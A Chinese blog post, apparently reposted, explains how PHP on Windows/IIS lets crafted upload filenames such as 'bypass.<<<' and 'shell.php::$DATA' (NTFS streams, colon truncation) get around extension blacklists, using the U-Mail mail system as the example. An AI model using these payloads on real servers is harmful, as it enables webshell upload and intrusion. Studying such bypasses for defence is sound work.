php懈垢windows通用上传缺陷
#1 实例介绍
本案例采用的实例是:U-Mail邮件系统。
U-Mail邮件系统文件上传的地方代码是这样的:
code 区域
<?php
if(ACTION =="attach-upload"){
if($_FILES){
$file_name = $_FILES['Filedata']['name'];
$file_type = $_FILES['Filedata']['type'];
$file_size = $_FILES['Filedata']['size'];
$file_source = $_FILES['Filedata']['tmp_name'];
$file_suffix = getfilenamesuffix( $file_name );
$not_allow_ext = array( "php", "phps", "php3", "exe", "bat" );
if (in_array($file_suffix, $not_allow_ext )){
dump_json( array( "status" => 0, "message" => el( "不支持该扩展名文件上传", "" ) ) );
}
$path_target = getusercachepath( );
do{
$file_id = makerandomname( );
$file_target = $path_target.$file_id.".".$file_suffix;
} while ( file_exists( $file_target ) );
if ( move_uploaded_file( $file_source, $file_target )){
dump_json( array( "status" => 0, "message" => el( "写入文件出错,请与管理员联系!", "" ) ) );
}
$_SESSION[SESSION_ID]['attach_cache'][] = array( "id" => $file_id, "name" => $file_name, "type" => "1", "path" => $file_target, "size" => $file_size );
dump_json( array( "status" => "1", "filename" => $file_name, "filesize" => $file_size, "file_id" => $file_id ) );
}else{
dump_json( array( "status" => "0", "message" => el( "无法找到需要上传的文件!", "" ) ) );
}
}
我们注意到如下的代码
code 区域
$not_allow_ext = array( "php", "phps", "php3", "exe", "bat" );
if (in_array($file_suffix, $not_allow_ext )){
dump_json( array( "status" => 0, "message" => el( "不支持该扩展名文件上传", "" ) ) );
}
非常明显,采用的是黑名单验证,虽然我们可以采用类似这样的文件后缀绕过程序的检测,如:bypass.phpX(这里的X代表空格%20或其他特殊字符{%80-%99}),但这完全不是今天我想要讲的内容。
今天,通过这个实例给大家讲解一种新型的文件上传方式,且听我细细道来..
#2 代码poc实现
为了在本地测试方便,我们对上述代码进行简化,如下
code 区域
<?php
//U-Mail demo ...
if(isset($_POST['submit'])){
$filename = $_POST['filename'];
$filename = preg_replace("/[^\w]/i", "", $filename);
$upfile = $_FILES['file']['name'];
$upfile = str_replace(';',"",$upfile);
$upfile = preg_replace("/[^(\w|\:|\$|\.|\<|\>)]/i", "", $upfile);
$tempfile = $_FILES['file']['tmp_name'];
$ext = trim(get_extension($upfile)); // null
if(in_array($ext,array('php','php3','php5'))){
die('Warning ! File type error..');
}
if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file';
//$savefile = 'upload/'.$upfile;
$savefile = 'upload/'.$filename.".".$ext;
if(move_uploaded_file($tempfile,$savefile)){
die('Success upload..path :'.$savefile);
}else{
die('Upload failed..');
}
}
function get_extension($file){
return strtolower(substr($file, strrpos($file, '.')+1));
}
?>
<html>
<body>
<form method="post" action="upfile.php" enctype="multipart/form-data">
<input type="file" name="file" value=""/>
<input type="hidden" name="filename" value="file"/>
<input type="submit" name="submit" value="upload"/>
</form>
</body>
</html>
对于上述代码,虽然是通过黑名单进行文件名检测,但通过目前已知的上传方法,是没有办法成功上传php文件的(不考虑程序的Bug),因此可以说这段文件上传的代码是"安全"的,
可是,我蓦然回首,在那个灯火阑珊的地方,php邂逅了Windows,美丽的爱情故事便由此产生了..
#3 细说故事
某天,二哥在群里丢了一个url连接,我简单看了下,关于利用系统特性进行文件上传的,兴趣马上就来了,就细细研究了下,于是有了这篇文章..
这几行英文的意思大致是,在php+window+iis环境下:
双引号(">") <==> 点号(".")';
大于符号(">") <==> 问号("?")';
小于符号("<") <==> 星号("*")';
有这么好玩的东西,那不就可以做太多的事了?但事实并不是这样,通过一系列的测试发现,该特性只能用于文件上传时覆盖已知的文件,于是这个特性便略显鸡肋..
原因有二:
1)上传文件的目录一般我们都不可控;
2)同时,一般文件上传的目录不可能存在我们想要的任何php文件,因此没办法覆盖;
后来,经过反反复复的思考,终于找到了可以完美利用的办法..
思路如下:
首先我们先利用特殊办法生成一个php文件,然后再利用这个特性将文件覆盖..
可问题又来了,怎样生成php文件呢?如果可以直接生成php文件的话,干嘛还要利用那什么特性?
别急,办法总是有的..
我们都知道在文件上传时,我们往往会考虑到文件名截断,如%00 等..
对!有的人可能还会用冒号(":")去截断,如:bypass.php:jpg
但是你知道吗?冒号截断产生的文件是空白的,里面并不会有任何的内容,呵呵 说到这里 明白了没有? 虽然生成的php文件里面没有内容,但是php文件总生成了吧,所以 我们可以结合上面所说的特性完美成功利用..
#4 冒号+特性成功利用
按照#3提供的思路,实现..
本地测试地址:http://www.secmap.cn/upfile.php 环境:Windows+IIS7.5
1)首先利用冒号生成我们将要覆盖的php文件,这里为:bypass.php,如图
点击forward后,可以看见成功生成空白的bypass.php文件
2)利用上面的系统特性覆盖该文件
从上面已经知道"<" 就等于 "*",而"*"代码任意字符,于是乎..
我们可以这样修改上传的文件名,如下:
code 区域
------WebKitFormBoundaryaaRARrn2LBvpvcwK
Content-Disposition: form-data; name="file"; filename="bypass.<<<"
Content-Type: image/jpeg
//注意!文件名为:bypass.<<<
点击go..,即可成功覆盖bypass.php文件,如图
对比上面的两个图,bypass.php被我们成功的写入了内容..
#5 特性二
首先来看看微软MSDN上面的一段话,如图
注意红色圈起来的英文
code 区域
The default data stream has no name. That is, the fully qualified name for the default stream for a file called "sample.txt" is "sample.txt::$DATA" since "sample.txt" is the name of the file and "$DATA" is the stream type.
看不去不错哟,试试吧..
同样,我们可以这样修改上传的文件名,如下:
code 区域
------WebKitFormBoundaryaaRARrn2LBvpvcwK
Content-Disposition: form-data; name="file"; filename='DataStreamTest.php::$DATA'
Content-Type: image/jpeg
//注意!文件名为:DataStreamTest.php::$DATA
点击GO,奇迹出现了..
访问之...
漏洞证明:
#6 漏洞证明
U-Mail,具体利用方法,同上述的方法一样,为了简单快捷的话,可直接抓包修改文件名为:
shell.php::$DATA 即可成功上传,这里不再演示,附shell
转载于:https://www.cnblogs.com/h4ck0ne/p/5154575.html
php懈垢windows通用上传缺陷相关推荐
- pkav之当php懈垢windows通用上传缺陷
$pkav->publish{当php懈垢windows} 剑心@xsser抛弃了我,但我却不能抛弃乌云.. php懈垢windows,就像男人邂逅女人,早晚都会出问题的.. 感谢二哥@gain ...
- 当php懈垢windows通用上传缺陷
转自独自等待博客 早上逛乌云发现了PKAV大牛的一篇文章,针对php和windows文件上传的分析,思路很YD,果断转之与大家分享. 虽然此文可能有许多的限制条件,但是如果你认真阅读会发现,其实还是比 ...
- 当php邂逅windows通用上传缺陷
早上逛乌云发现了PKAV大牛的一篇文章,针对php和windows文件上传的分析,思路很YD,果断转之与大家分享. 虽然此文可能有许多的限制条件,但是如果你认真阅读会发现,其实还是比较实用的. 另外一 ...
- 怎么在windows服务器上传文件,windows服务器文件上传
windows服务器文件上传 内容精选 换一换 您需要在源端服务器上安装迁移Agent并且输入目的端服务器所在华为云账号的AK/SK,迁移Agent启动成功后会收集源端服务器信息并自动发送给主机迁移服 ...
- Windows如何上传代码到Github
1.首先得安装git客户端 进入官网:https://git-scm.com/ ,点击右侧下载windows版本的软件包,然后双击安装就可以了. 安装完成之后,在开始菜单可以看到,此时,在想上传的文件 ...
- 教你在Windows下上传iOS APP ipa到苹果应用商店App Store
比appuploader更快捷方便的平台-初雪云(chuxueyun),初雪云是一个非常快捷的应用上传工具,介绍下我们的平台:怎么上传iPA到AppStore?在线上传IPA包无需Mac电脑,wind ...
- windows文件上传到linux平台乱码的解决办法
windows文件上传到linux平台乱码的解决办法 1.首先在windows上,使用ConvertZ工具,把文件名称(不是文件内容)转码,例如GBK换成Unicode 简体 2.然后上传到linux ...
- python向windows服务器上传文件(夹)
python向windows服务器上传文件(夹) 本人需求分析: 需要从本地将某个指定目录下的文件夹上传至服务器的某个指定目录下. 这次思路是采用python的 paramiko 库.paramiko ...
- SpringBoot+El-upload实现上传文件到通用上传接口并返回文件全路径(若依前后端分离版源码分析)
场景 SpringBoot+ElementUI实现通用文件下载请求(全流程图文详细教程): https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/deta ...
最新文章
- Docker学习(5)——创建私有仓库,为私有仓库添加web界面
- 改变listview的每个item的背景色
- WINCE6.0文件系统及存储管理器
- boost::hana::prepend用法的测试程序
- java下拉菜单_Web前端和Java开发哪个薪资更高,发展前景更好?
- 基于AFNetworking的封装的工具类
- ffmpeg 0.6.3 代码, 经过我努力,能够在vs 2005 下单步调试代码
- 分布式数据库中间件 MyCat 安装及使用
- 对AOP切面的一些整理与理解
- 浅谈Oracle执行计划
- PowerShell: 如何使用powershell处理Excel
- Winrunner经验总结
- CS 3:威胁情报解决方案峰会——数据是威胁情报的基础
- 用Python设置Excel样式
- 计算机名和ip不匹配,错误:主机名/ IP不匹配证书的altnames Node.js的
- 优秀程序员的博客有哪些?(2021 年 3 月版)
- GPT,GPT-2,GPT-3
- JeecgBoot全套开发环境搭建
- Python 爬虫入门(二)——爬取妹子图
- 牛客网 15029 (栈)